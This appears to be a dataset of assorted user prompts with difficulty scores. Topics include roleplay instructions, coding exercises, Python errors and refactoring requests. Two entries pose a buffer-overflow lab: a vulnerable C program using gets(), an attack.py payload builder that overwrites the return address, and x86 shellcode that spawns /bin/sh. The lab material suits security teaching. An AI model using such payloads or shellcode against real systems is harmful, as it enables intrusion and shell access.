ROLEPLAY STRUCTURE
As a systematic roleplay chatbot, you have a very specific structure when it come to writing your roleplay.
First step, you begin by writing your roleplay description in triple backtick. This description serve to explain what currently happen in your roleplay.
Second step is optional. If your story require between goal 1-3, you write description for it in another backtick. For example, writing description for task, option, or help request.
Third step, you write down your dialogue below it. You focus on dialogue. You don't write action or scene description here. You focus on the word of your character, BatCat.
Below is example of your output:
'
|
2c4702453ea3549a70863bf7f7c43559
|
{
"intermediate": 0.3431650996208191,
"beginner": 0.36700233817100525,
"expert": 0.28983253240585327
}
|
45,722
|
I interviewd some candidates for mern stack position
IN node js and mongodb
They couldnt able to answer practical questions like
i asked them what is the use of express and can we create a node js app without express
and what is mongoose without mongoose can we create a connection betweenn node js and mongodb
they said no we cant do for both questions.
so what i understood is they just crammed some tutorials or some document and they are just telling answers with out actuially knowing what it is exactly
So for the written test , Please prepare 10 questions for nodejs which contains above type of questions also and some tricky code snippets in nodejs or javascript
remember these should be choose the correct options kind of questions
some with code snippets regarding event loop , promise or some tricky js or some questions on correct code snippet to connect to mongodb etc...
|
1b3b365e1a7c7550c1fd6c68cdf92c0b
|
{
"intermediate": 0.3580695688724518,
"beginner": 0.5300515294075012,
"expert": 0.111878901720047
}
|
45,723
|
Write a program in python that gets a dynamic number of input values.
The first input is a number that represents the number of the input values following it. The next input values are whole numbers.
In the end, print the sum of all the input numbers (not including the first input).
For example,
Input:
3
1
5
6
Expected output: 12
Explanation:
1 + 5 + 6 = 12, and there are exactly 3 numbers following the first input number (3).
Hints
Hint 1
Revealed
Initialize res variable with value 0, add the input numbers to it, in the end print res!
Hint 2
Revealed
Assuming n is the first input, here is a part of the code,
for i in range(n):
a = int(input())
??? += a
|
cb71aaa6bb8e155bfac0df0ca3e5e10a
|
{
"intermediate": 0.2993257939815521,
"beginner": 0.39394718408584595,
"expert": 0.3067270815372467
}
|
45,724
|
Perform a complex Leipzig glossing of this sentence.
"Please do not attempt engagement with the monsters."
|
ec9f446919fc8f7117641bfe2fd827ac
|
{
"intermediate": 0.2618264853954315,
"beginner": 0.4735898971557617,
"expert": 0.2645835876464844
}
|
45,725
|
How to implement mvvm pattern with have
|
cba74b079624abfd35567491dc4b4c3e
|
{
"intermediate": 0.20976196229457855,
"beginner": 0.142000213265419,
"expert": 0.6482378244400024
}
|
45,726
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
|
4ac996d684b0f0f4743c651a6390a4d0
|
{
"intermediate": 0.34207162261009216,
"beginner": 0.4208764433860779,
"expert": 0.23705193400382996
}
|
45,727
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
Target function address is 08049196.
The following will try to help you understand attack string:
Stack layout of vulnerable program contains buf which is 4 bytes, Other vars which is 8 bytes, %ebp which is 4 bytes, %eip and &arg1 while the prompt function invoking. The goal is to overwrite the buffer until return address(%eip) on the stack has contains the target function address. Based on this, construct you attack string carefully. One thing to be aware is the address in little-endian format. For example, if target address is ”0xdeadbeef”, then the bytes of return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop....., injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. nops(0x90) can be filled in the between the return address and injected malicious code to increase the chance that injected malicious code will be executed. The nop instruction will do nothing but jump to the instruction.
4. The shellcode then provided as payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Use the attack program to generate the attack payload for this shellcode exploitation.
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder='little')
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b'A' * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open("attack_string", "wb") as f:
f.write(attack_string)
print("Attack string saved to 'attack_string'.")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 attack.py [target function address]")
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
Providing the argument as ”shellcode” to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell string" which stores the attack payload for launching the shellcode.
|
966c96cfd1f32962a441067ce14d5ede
|
{
"intermediate": 0.3586297631263733,
"beginner": 0.33257320523262024,
"expert": 0.30879703164100647
}
|
45,728
|
How to implement mvvm pattern with haxe example
|
d3682a0a37cf86bddf43b2b42b0897c6
|
{
"intermediate": 0.24571838974952698,
"beginner": 0.0952911525964737,
"expert": 0.6589904427528381
}
|
45,729
|
8E6
|
3cbfadbc748e68f29716fea28ce468c8
|
{
"intermediate": 0.3300527036190033,
"beginner": 0.29998961091041565,
"expert": 0.36995768547058105
}
|
45,730
|
Is there arch-chroot alternative for NixOS?
|
698fff195be815d9eddeafe456e72b73
|
{
"intermediate": 0.27316075563430786,
"beginner": 0.21939755976200104,
"expert": 0.5074416995048523
}
|
45,731
|
write arduino code for runnig lora ra-02 sx1278 with radioHead lib
|
9cbfda7ec043336dd228ddbca449646e
|
{
"intermediate": 0.5526975989341736,
"beginner": 0.15187780559062958,
"expert": 0.29542461037635803
}
|
45,732
|
PROMPT DESCRIPTION
You are a systematic roleplay chatbot.
You possess deep understanding in chat roleplay. You excel in using markdown format to format different parts of your roleplay.
Example of your markdown format usage include the use of bold, italic, backtick, and triple backtick to format different part of your roleplay.
You excel in building complex roleplay ecosystem. You excel in keeping track large amount of elements in your roleplay (location, action, enemies, characters, and equipments)
You possess deep understanding in writing roleplay description. For this roleplay, your description is technical, compact, and intricate.
Your description length is 50 words.
You are able to differentiate clearly between yourself and user.
"""
ROLE DESCRIPTION
Here, you will roleplay as BatCat. You are a feline vigilante who patrol the rooftops and alleyway of Gootham City.
Your approach is dramatic and hilariously botched. You always make your entrance by crashing your batmobile through a building.
Your stakes are often high. The criminals threaten to destroy the city or explode Gootham, yet you are often distracted by cat recreations.
These recreations include giant yarn ball rolling through the city, laser pointer marked by enemy sniper, fish market mayhem, etc.
"""
ROLEPLAY GOALS
As roleplay chatbot, your tasks are 2; build roleplay event for user & decide the right time to involve user in the roleplay.
When it come to creating user involvement, you have 4 different goals to choose.
You only select one goal according to the right condition.
Your 4 goals are;
1) Give task to user,
2) Give option to user (options on what to do on the current story condition),
3) Ask help to user (regarding your current story condition)
4) Neutral
If the current event require an individual's action to drive the plot forward, you give detailed step-by-step task to user to do that action (goal 1)
If the current event have several possible route to follow, you give options to user on what route to take (goal 2)
If the current event put you in hard spot, and you require help from other party, you ask help to user (goal 3)
If the current event don't use user's involvement, you use neutral. This is useful for ex; introducing yourself, focusing to explain the scene, or doing calm chat (goal 4)
"""
ROLEPLAY CHAIN OF THOUGHT
There are several chain-of-thought you follow to determine the action to do in the current roleplay event.
1) Is it the start of roleplay?
Start of roleplay is signed by non-existent chat in your chat history. This signify this is time to start new roleplay session.
You start by crashing your batmobile in front of user. Then, you immediately put user in high-stake conflict. You create a complex conflict filled with location, event, enemies, characters, and equipments.
2) What is the current roleplay condition?
You keep track of elements played in the roleplay. You keep track the condition of each location, event, enemies, characters, and equipments in the story.
You write the story according to the condition of these elements. You write your response according to the condition of these elements. You direct user's action according to the condition of these elements.
"""
ROLEPLAY STRUCTURE
As a systematic roleplay chatbot, you have a very specific structure when it come to writing your roleplay.
First step, you begin by writing your roleplay description in triple backtick. This description serve to explain what currently happen in your roleplay.
Second step is optional. If your story require between goal 1-3, you write description for it in another backtick. For example, writing description for task, option, or help request.
Third step, you write down your dialogue below it. You focus on dialogue. You don't write action or scene description here. You focus on the word of your character, BatCat.
|
0bfac31e7386c04d7cc3a59bcc36a807
|
{
"intermediate": 0.24332191050052643,
"beginner": 0.49855998158454895,
"expert": 0.2581181526184082
}
|
45,733
|
when i ran pip install --no-cache-dir -r requirements.txt, everything was running fine until this, ERROR: Exception:
Traceback (most recent call last):
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\cli\base_command.py", line 180, in exc_logging_wrapper
status = run_func(*args)
^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\cli\req_command.py", line 245, in wrapper
return func(self, options, args)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\commands\install.py", line 377, in run
requirement_set = resolver.resolve(
^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\resolver.py", line 95,
in resolve
result = self._result = resolver.resolve(
^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\resolvelib\resolvers.py", line 546, in resolve
state = resolution.resolve(requirements, max_rounds=max_rounds)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\resolvelib\resolvers.py", line 397, in resolve
self._add_to_criteria(self.state.criteria, r, parent=None)
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\resolvelib\resolvers.py", line 173, in _add_to_criteria
if not criterion.candidates:
^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\resolvelib\structs.py", line 156, in __bool__
return bool(self._sequence)
^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\found_candidates.py", line 155, in __bool__
return any(self)
^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\found_candidates.py", line 143, in <genexpr>
return (c for c in iterator if id(c) not in self._incompatible_ids)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\found_candidates.py", line 47, in _iter_built
candidate = func()
^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\factory.py", line 182,
in _make_candidate_from_link
base: Optional[BaseCandidate] = self._make_base_candidate_from_link(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\factory.py", line 228,
in _make_base_candidate_from_link
self._link_candidate_cache[link] = LinkCandidate(
^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\candidates.py", line 290, in __init__
super().__init__(
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\candidates.py", line 156, in __init__
self.dist = self._prepare()
^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\candidates.py", line 222, in _prepare
dist = self._prepare_distribution()
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\resolution\resolvelib\candidates.py", line 301, in _prepare_distribution
return preparer.prepare_linked_requirement(self._ireq, parallel_builds=True)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\operations\prepare.py", line 525, in prepare_linked_requirement
return self._prepare_linked_requirement(req, parallel_builds)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\operations\prepare.py", line 640, in _prepare_linked_requirement
dist = _get_prepared_distribution(
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\operations\prepare.py", line 71, in _get_prepared_distribution
abstract_dist.prepare_distribution_metadata(
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\distributions\sdist.py", line 54, in prepare_distribution_metadata
self._install_build_reqs(finder)
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\distributions\sdist.py", line 124, in _install_build_reqs
build_reqs = self._get_build_requires_wheel()
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\distributions\sdist.py", line 101, in _get_build_requires_wheel
return backend.get_requires_for_build_wheel()
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_internal\utils\misc.py", line 745, in get_requires_for_build_wheel
return super().get_requires_for_build_wheel(config_settings=cs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\pyproject_hooks\_impl.py", line 166, in get_requires_for_build_wheel
return self._call_hook('get_requires_for_build_wheel', {
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\pyproject_hooks\_impl.py", line 321, in _call_hook
raise BackendUnavailable(data.get('traceback', ''))
pip._vendor.pyproject_hooks._impl.BackendUnavailable: Traceback (most
recent call last):
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip\_vendor\pyproject_hooks\_in_process\_in_process.py", line 77, in _build_backend
obj = import_module(mod_path)
^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\buggy\AppData\Local\Programs\Python\Python312\Lib\importlib\__init__.py", line 90, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
File "<frozen importlib._bootstrap>", line 1310, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
File "<frozen importlib._bootstrap>", line 1331, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 935, in _load_unlocked
File "<frozen importlib._bootstrap_external>", line 995, in exec_module
File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
File "C:\Users\buggy\AppData\Local\Temp\pip-build-env-0hgi89py\overlay\Lib\site-packages\setuptools\__init__.py", line 10, in <module>
import distutils.core
ModuleNotFoundError: No module named 'distutils'
|
05cc22aa508c3f379fd7430f490758fe
|
{
"intermediate": 0.30553966760635376,
"beginner": 0.4280484616756439,
"expert": 0.2664118707180023
}
|
45,734
|
Javafx mvvm example
|
857d5ca29d48ffcf2b5d63f3640ee26e
|
{
"intermediate": 0.3794255554676056,
"beginner": 0.18095763027668,
"expert": 0.4396167993545532
}
|
45,735
|
how to clone a git branch o a windows machine using gitlab runner
|
4e221882a032e50835f97748ebb8be03
|
{
"intermediate": 0.4011927545070648,
"beginner": 0.2509608566761017,
"expert": 0.3478463590145111
}
|
45,736
|
public override EventExecutionError CanExecute(CGGameMode gameMode)
{
AccurateCardPosition cardPosition = gameMode.GetCardPosition(m_minion);
if (cardPosition.CardPositionType != CardPositionTypes.HandCardDeck)
{
return $"Card {m_minion} must at {CardPositionTypes.HandCardDeck} to be deployed";
}
Card cardObject = gameMode.GetActorObject(m_minion);
if (cardObject.GetCardType() != CardTypes.MinionCard)
{
return $"Card {m_minion} must be MinionCard to be deployed";
}
Player playerObject = gameMode.GetActorObject(cardObject.GetOwnerPlayer());
if (m_isSacrifice)
{
BattleField battleField = gameMode.GetBattleFieldObject(playerObject.GetPlayerPosition());
ActorRef<Card>? result = battleField.GetCard(m_destPosition.SubPosition);
Card sacrificeCard = gameMode.GetActorObject(result.Value);
int sacrificeCost = sacrificeCard.GetCost().Value.Value.intValue / 2;
if (sacrificeCard.HasEffect(CardKeyWordType.Degrade))
{
sacrificeCost = 0;
}
if (playerObject.GetPlayerCost().Value.Value.intValue + sacrificeCost <
cardObject.GetCost().Value.Value.intValue)
{
return "Not enough PlayerCost";
}
}
if (!m_isSacrifice && playerObject.GetPlayerCost() - cardObject.GetCost() < PlayerCost.Zero)
{
return "Not enough PlayerCost";
}
if (gameMode.IsPartnerMode)
{
if ((playerObject.GetPlayerPosition().Equals(PlayerPosition.Zero) ||
playerObject.GetPlayerPosition().Equals(PlayerPosition.Two)) &&
m_destPosition.PlayerPosition.Equals(PlayerPosition.One))
{
return "MinionCard must deployed on ownSide";
}
}
if (!gameMode.IsPartnerMode && !playerObject.GetPlayerPosition().Equals(m_destPosition.PlayerPosition))
{
return "MinionCard must deployed on ownSide";
}
if (!m_isSacrifice)
{
CGGameMode.MoveCardIn moveCardParam = new CGGameMode.MoveCardIn()
{
Card = m_minion,
DestPosition = new AccurateCardPosition(m_destPosition),
};
EventExecutionError error = gameMode.CanMoveCard(moveCardParam);
return error;
}
return true;
} 帮忙优化一下代码
|
07c8474259e551809969c60139615a4b
|
{
"intermediate": 0.27722465991973877,
"beginner": 0.5257734060287476,
"expert": 0.19700197875499725
}
|
45,737
|
public override EventExecutionError CanExecute(CGGameMode gameMode)
{
AccurateCardPosition cardPosition = gameMode.GetCardPosition(m_minion);
if (cardPosition.CardPositionType != CardPositionTypes.HandCardDeck)
{
return $"Card {m_minion} must at {CardPositionTypes.HandCardDeck} to be deployed";
}
Card cardObject = gameMode.GetActorObject(m_minion);
if (cardObject.GetCardType() != CardTypes.MinionCard)
{
return $"Card {m_minion} must be MinionCard to be deployed";
}
Player playerObject = gameMode.GetActorObject(cardObject.GetOwnerPlayer());
if (m_isSacrifice)
{
BattleField battleField = gameMode.GetBattleFieldObject(playerObject.GetPlayerPosition());
ActorRef<Card>? result = battleField.GetCard(m_destPosition.SubPosition);
Card sacrificeCard = gameMode.GetActorObject(result.Value);
int sacrificeCost = sacrificeCard.GetCost().Value.Value.intValue / 2;
if (sacrificeCard.HasEffect(CardKeyWordType.Degrade))
{
sacrificeCost = 0;
}
if (playerObject.GetPlayerCost().Value.Value.intValue + sacrificeCost <
cardObject.GetCost().Value.Value.intValue)
{
return "Not enough PlayerCost";
}
}
if (!m_isSacrifice && playerObject.GetPlayerCost() - cardObject.GetCost() < PlayerCost.Zero)
{
return "Not enough PlayerCost";
}
if (gameMode.IsPartnerMode)
{
if ((playerObject.GetPlayerPosition().Equals(PlayerPosition.Zero) ||
playerObject.GetPlayerPosition().Equals(PlayerPosition.Two)) &&
m_destPosition.PlayerPosition.Equals(PlayerPosition.One))
{
return "MinionCard must deployed on ownSide";
}
}
if (!gameMode.IsPartnerMode && !playerObject.GetPlayerPosition().Equals(m_destPosition.PlayerPosition))
{
return "MinionCard must deployed on ownSide";
}
if (!m_isSacrifice)
{
CGGameMode.MoveCardIn moveCardParam = new CGGameMode.MoveCardIn()
{
Card = m_minion,
DestPosition = new AccurateCardPosition(m_destPosition),
};
EventExecutionError error = gameMode.CanMoveCard(moveCardParam);
return error;
}
return true;
} 帮忙优化一下这段代码
|
ff5efbf71af0a4d230d54a9118776392
|
{
"intermediate": 0.27722465991973877,
"beginner": 0.5257734060287476,
"expert": 0.19700197875499725
}
|
45,738
|
AccurateCardPosition cardPosition = gameMode.GetCardPosition(m_minion);
if (cardPosition.CardPositionType != CardPositionTypes.HandCardDeck)
{
return $"Card {m_minion} must at {CardPositionTypes.HandCardDeck} to be deployed";
}
Card cardObject = gameMode.GetActorObject(m_minion);
if (cardObject.GetCardType() != CardTypes.MinionCard)
{
return $"Card {m_minion} must be MinionCard to be deployed";
}
Player playerObject = gameMode.GetActorObject(cardObject.GetOwnerPlayer());
if (m_isSacrifice)
{
BattleField battleField = gameMode.GetBattleFieldObject(playerObject.GetPlayerPosition());
ActorRef<Card>? result = battleField.GetCard(m_destPosition.SubPosition);
Card sacrificeCard = gameMode.GetActorObject(result.Value);
int sacrificeCost = sacrificeCard.GetCost().Value.Value.intValue / 2;
if (sacrificeCard.HasEffect(CardKeyWordType.Degrade))
{
sacrificeCost = 0;
}
if (playerObject.GetPlayerCost().Value.Value.intValue + sacrificeCost <
cardObject.GetCost().Value.Value.intValue)
{
return "Not enough PlayerCost";
}
}
if (!m_isSacrifice && playerObject.GetPlayerCost() - cardObject.GetCost() < PlayerCost.Zero)
{
return "Not enough PlayerCost";
}
if (gameMode.IsPartnerMode)
{
if ((playerObject.GetPlayerPosition().Equals(PlayerPosition.Zero) ||
playerObject.GetPlayerPosition().Equals(PlayerPosition.Two)) &&
m_destPosition.PlayerPosition.Equals(PlayerPosition.One))
{
return "MinionCard must deployed on ownSide";
}
}
if (!gameMode.IsPartnerMode && !playerObject.GetPlayerPosition().Equals(m_destPosition.PlayerPosition))
{
return "MinionCard must deployed on ownSide";
}
if (!m_isSacrifice)
{
CGGameMode.MoveCardIn moveCardParam = new CGGameMode.MoveCardIn()
{
Card = m_minion,
DestPosition = new AccurateCardPosition(m_destPosition),
};
EventExecutionError error = gameMode.CanMoveCard(moveCardParam);
return error;
}
return true; 帮忙优化一下这段代码
|
145c4c5ecb7e176ccb22fb6dc2970cdf
|
{
"intermediate": 0.33839988708496094,
"beginner": 0.5128330588340759,
"expert": 0.1487671434879303
}
|
45,739
|
Напиши программу на beautiful-soup чтобы извлечь из кода ниже ссылку:
<div class="newsitem" style="background:url('images/military/2019/brif-194-120%281%29%2815%29.jpg') no-repeat;">
<span class="date">07.04.2024 (13:35)</span>
<a href="spec_mil_oper/brief/briefings/more.htm?id=12508033@egNews" target="_self">Сводка Министерства обороны Российской Федерации о ходе проведения специальной военной операции (по состоянию на 7 апреля 2024 г.)</a>
</div>
|
418043d20134a5b1633dd0fcd7dcfde9
|
{
"intermediate": 0.3509156107902527,
"beginner": 0.32867997884750366,
"expert": 0.32040444016456604
}
|
45,740
|
AccurateCardPosition cardPosition = gameMode.GetCardPosition(m_minion);
if (cardPosition.CardPositionType != CardPositionTypes.HandCardDeck)
{
return $"Card {m_minion} must at {CardPositionTypes.HandCardDeck} to be deployed";
}
Card cardObject = gameMode.GetActorObject(m_minion);
if (cardObject.GetCardType() != CardTypes.MinionCard)
{
return $"Card {m_minion} must be MinionCard to be deployed";
}
Player playerObject = gameMode.GetActorObject(cardObject.GetOwnerPlayer());
if (m_isSacrifice)
{
BattleField battleField = gameMode.GetBattleFieldObject(playerObject.GetPlayerPosition());
ActorRef<Card>? result = battleField.GetCard(m_destPosition.SubPosition);
Card sacrificeCard = gameMode.GetActorObject(result.Value);
int sacrificeCost = sacrificeCard.GetCost().Value.Value.intValue / 2;
if (sacrificeCard.HasEffect(CardKeyWordType.Degrade))
{
sacrificeCost = 0;
}
if (playerObject.GetPlayerCost().Value.Value.intValue + sacrificeCost <
cardObject.GetCost().Value.Value.intValue)
{
return "Not enough PlayerCost";
}
}
if (!m_isSacrifice && playerObject.GetPlayerCost() - cardObject.GetCost() < PlayerCost.Zero)
{
return "Not enough PlayerCost";
} 帮忙优化这段代码
|
be1a672262378688d924bbf887feb350
|
{
"intermediate": 0.3651009798049927,
"beginner": 0.3665151596069336,
"expert": 0.2683838903903961
}
|
45,741
|
k
|
98c534fadb109ce48794b217852ca35b
|
{
"intermediate": 0.3233119249343872,
"beginner": 0.31007635593414307,
"expert": 0.3666117191314697
}
|
45,742
|
what's wrong with this code which does not enter the for loop?
for i in range(NumTest):
print(i)
allindex=list(range(len(X)))
indices=allindex
r1=random.randint(0,len(X)-1)
r2=random.randint(0,len(X)-1)
print(r1)
print(r2)
if r1==r2:
if r1<len(X)-1:
r2=r1+1
else:
r2=r1-1
r=[r1,r2]
r1=np.max(r)
r2=np.min(r)
del indices[r1]
del indices[r2]
XTR=X[indices]
XTS=X[r]
YTR=Y.iloc[indices]
YTS=Y.iloc[r]
labelTr = YTR
labelTs = YTS
dtrain = xgb.DMatrix(XTR,label=labelTr)
dtest = xgb.DMatrix(XTS,label=labelTs)
num_round = 10
bst = xgb.train(param, dtrain, num_round)
ypred = bst.predict(dtest)
ytest=YTS.to_numpy()
ytest=np.transpose(ytest)
ypred=np.reshape(ypred,ytest.shape)
loss=np.abs(ytest-ypred)
mape=100*METRICS.mean_absolute_percentage_error(ytest, ypred)
mae=np.mean(loss)
rmse=np.sqrt(np.mean(loss**2))
MAPE.append(mape)
MAE.append(mae)
RMSE.append(RMSE)
MEAN_MAE=np.mean(MAE)
MEAN_RMSE=np.mean(RMSE)
MEAN_MAPE=np.mean(MAPE)
|
e3452526d9c2d732d1144e1b726d596d
|
{
"intermediate": 0.2565993368625641,
"beginner": 0.5126497745513916,
"expert": 0.23075085878372192
}
|
45,743
|
how to install thefuzz
|
0c6b90b8f94f0385de00c63729d00c41
|
{
"intermediate": 0.43965741991996765,
"beginner": 0.23058095574378967,
"expert": 0.32976165413856506
}
|
45,744
|
mój błą:
[INFO] Downloading from remote-repository: https://af2.corpo.t-mobile.pl/artifactory/cindy-maven-remote-repositories/org/postgresql/postgresql/42.6.0/postgresql-42.6.0.jar
[INFO] ------------------------------------------------------------------------
[INFO] BUILD FAILURE
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 46.179 s
[INFO] Finished at: 2024-04-08T00:04:33Z
[INFO] ------------------------------------------------------------------------
[ERROR] Failed to execute goal on project digital-synthetic-live-monitoring: Could not resolve dependencies for project pl.t-mobile.ssta:digital-synthetic-live-monitoring:jar:1.0-SNAPSHOT: Could not transfer artifact org.postgresql:postgresql:jar:42.6.0 from/to snapshot-repository (https://af2.corpo.t-mobile.pl/artifactory/cindy-maven-projects): Transfer failed for https://af2.corpo.t-mobile.pl/artifactory/cindy-maven-projects/org/postgresql/postgresql/42.6.0/postgresql-42.6.0.jar 409 -> [Help 1]
[ERROR]
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR]
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/DependencyResolutionException
|
95b6292a75e005b49d3615236fcf699d
|
{
"intermediate": 0.5261849761009216,
"beginner": 0.2341683804988861,
"expert": 0.23964665830135345
}
|
45,745
|
how do i Ensure the cookies.json file is present with necessary credentials for storyblocks.com website access
|
637e4c207362fab6d238017a8715cd2b
|
{
"intermediate": 0.4423675835132599,
"beginner": 0.2759445607662201,
"expert": 0.28168785572052
}
|
45,746
|
i want to make a minecraft server plugin that opens a web server with diffrent live cameras that can be installed in game (they look like player heads with skins)
|
8ce8cbabf7a2ad7c59b6ccfe55a65bfd
|
{
"intermediate": 0.5448375344276428,
"beginner": 0.14279168844223022,
"expert": 0.31237077713012695
}
|
45,747
|
fixe mir diesen code <?xml version="1.0" encoding="ISO-8859-1"?>
<restaurant>
<food category="Pizza">
<title lang="en">Salami</title>
<calories>873</calories>
<supplier>Dominos<supplier/>
<price>7.49</price>
</food>
<food category="Burger">
<title lang="en">Big Tasty Bacon</title>
<calories>890</calories>
<supplier>MC Donalds</supplier>
<price>7.89</price>
</food>
<food category="Burger">
<title lang="en">Whooper</title>
<calories>626</calories>
<supplier>Burger King</supplier>
<price>4.99</price>
</food>
</restaurant>
|
23aa61bca14c90a86682a3d88c3caf3d
|
{
"intermediate": 0.4052563011646271,
"beginner": 0.3103271424770355,
"expert": 0.2844165861606598
}
|
45,748
|
base) PS F:\testpython> python .\test01.py
Traceback (most recent call last):
File "F:\testpython\test01.py", line 52, in <module>
package.write_to_file('pure-text-facts.apkg')
File "D:\anaconda\Lib\site-packages\genanki\package.py", line 40, in write_to_file
self.write_to_db(cursor, timestamp, id_gen)
File "D:\anaconda\Lib\site-packages\genanki\package.py", line 60, in write_to_db
